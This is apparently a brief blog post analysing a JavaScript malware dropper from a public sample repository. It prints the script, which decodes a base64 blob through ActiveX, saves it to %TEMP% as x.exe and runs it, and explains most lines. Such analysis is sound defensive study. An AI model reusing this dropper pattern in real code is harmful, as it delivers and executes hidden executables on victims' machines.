Analysis Malicious Javascript
JavaScript, like other scripts, is widely used by malware developers to achieve their goals. In this article we will briefly discuss how to analyze a JavaScript malware file. It tries to download an executable file and then execute it on the infected person's system.
Sample Link : https://bazaar.abuse.ch/sample/ec5fed5b989a2f26c19a6cd23e5f307ab31e694415df0cdf78605c7be0be1ca6/
Malicious Code [ Our Scope ] :
var D=new ActiveXObject("Microsoft.XMLDOM")
var E=D.createElement("t")
E.dataType="bin.base64"
E.text="TVqQAAMAAAAEAAAA"
var b=new ActiveXObject("ADODB.Stream")
var p=new ActiveXObject("Scripting.FileSystemObject").GetSpecialFolder(2)
b.Type=1
b.Open()
b.Write(E.nodeTypedValue)
b.SaveToFile(p+"\\x.exe",2)
new ActiveXObject("WScript.Shell").Run(p+"\\x.exe")
Code Analysis :
1- Malware Developer Declare a variable : var D = new ActiveXObject("Microsoft.XMLDOM"). this code like is used to create object that used in Internet Explorer.
2- var E=D.createElement("t") This code is tell XML Reader to create a new XML tag.
3- Malware Developer tell that a file or data type of the file is a Binary . E.dataType="bin.base64"
7- b.Type=1 is means that is a binary data not text
8- b.Open() is means that open a binary .
9- b.Write(E.nodeTypedValue) . is mean write a value into binary data .
10- Save the executable file ( binary ) into the %TEMP% folder : b.SaveToFile(p+"\\x.exe",2).
11- new ActiveXObject("WScript.Shell").Run(p+"\\x.exe"). Malware Developer is interact with a shell to execute a written values into the binary.
E.text="TVqQAAMAAAAEAAAA" screenshot ( Decoded Version ):
E.text="TVqQAAMAAAAEAAAA" screenshot ( Encoded Version ):
Comments
Post a Comment